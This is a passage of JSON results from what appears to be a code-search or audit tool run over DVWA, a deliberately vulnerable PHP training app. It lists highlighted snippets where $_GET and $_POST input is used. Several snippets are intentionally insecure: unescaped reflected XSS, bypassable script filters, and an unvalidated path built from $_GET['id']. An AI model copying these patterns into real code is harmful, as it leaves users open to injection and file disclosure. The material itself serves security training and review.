operator\">==</span> <span class=\"token string\">'fi'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$vuln</span> <span class=\"token operator\">=</span> <span class=\"token string\">'File Inclusion'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> }",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 278,
"file": "/home/chris/src/DVWA-master/vulnerabilities/view_source_all.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">6:</span> <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'authenticated'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Source'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> <span class=\"token variable\">$lowsrc</span> <span class=\"token operator\">=</span> @<span class=\"token function\">file_get_contents</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"./{$id}/source/low.php\"</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> <span class=\"token variable\">$lowsrc</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'$html .='</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'echo'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$lowsrc</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> <span class=\"token variable\">$lowsrc</span> <span class=\"token operator\">=</span> <span class=\"token function\">highlight_string</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$lowsrc</span><span class=\"token punctuation\">,</span> <span class=\"token boolean\">true</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> ",
"line": 11,
"start": 6,
"end": 17,
"severity": "unknown",
"note": ""
},
{
"id": 283,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/high.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">preg_replace</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Hello ${name}</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 4,
"start": 1,
"end": 10,
"severity": "unknown",
"note": ""
},
{
"id": 284,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/high.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">preg_replace</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Hello ${name}</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> }\n<span class=\"line-number\">11:</span> ",
"line": 6,
"start": 1,
"end": 12,
"severity": "unknown",
"note": ""
},
{
"id": 285,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">6:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 4,
"start": 1,
"end": 10,
"severity": "unknown",
"note": ""
},
{
"id": 286,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">6:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Hello ${name}</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> }\n<span class=\"line-number\">14:</span> ",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 289,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/low.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'<pre>Hello '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> }\n<span class=\"line-number\">8:</span> \n<span class=\"line-number\">9:</span> <span class=\"token operator\">?</span><span class=\"token operator\">></span>",
"line": 4,
"start": 1,
"end": 10,
"severity": "unknown",
"note": ""
},
{
"id": 290,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/low.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'<pre>Hello '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> }\n<span class=\"line-number\">8:</span> \n<span class=\"line-number\">9:</span> <span class=\"token operator\">?</span><span class=\"token operator\">></span>\n<span class=\"line-number\">10:</span> ",
"line": 6,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 291,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/medium.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<script>'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Hello ${name}</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 4,
"start": 1,
"end": 10,
"severity": "unknown",
"note": ""
},
{
"id": 292,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/medium.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<script>'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>Hello ${name}</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> }\n<span class=\"line-number\">11:</span> ",
"line": 6,
"start": 1,
"end": 12,
"severity": "unknown",
"note": ""
},
{
"id": 29,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">59:</span> \t\t<span class=\"token operator\">*</span> <span class=\"token keyword\">with</span> your variables_order settings\n<span class=\"line-number\">60:</span> \t\t<span class=\"token operator\">*</span><span class=\"token operator\">/</span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$request</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>\n<span class=\"line-number\">62:</span> \t\t\t<span class=\"token string\">'REQUEST'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">63:</span> \t\t\t<span class=\"token string\">'GET'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">64:</span> \t\t\t<span class=\"token string\">'POST'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">65:</span> \t\t\t<span class=\"token string\">'COOKIE'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_COOKIE</span>\n<span class=\"line-number\">66:</span> \t\t<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">67:</span> \n<span class=\"line-number\">68:</span> \t\t<span class=\"token variable\">$init</span> <span class=\"token operator\">=</span> IDS_Init<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token function\">init</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_PHPIDS <span class=\"token punctuation\">.</span> <span class=\"token string\">'lib/IDS/Config/Config.ini'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">69:</span> ",
"line": 64,
"start": 59,
"end": 70,
"severity": "unknown",
"note": ""
},
{
"id": 43,
"file": "/home/chris/src/DVWA-master/login.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">5:</span> \n<span class=\"line-number\">6:</span> <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"highlight\"><span class=\"line-number\">10:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"line-number\">12:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'login.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 10,
"start": 5,
"end": 16,
"severity": "unknown",
"note": ""
},
{
"id": 44,
"file": "/home/chris/src/DVWA-master/login.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"line-number\">12:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'login.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token 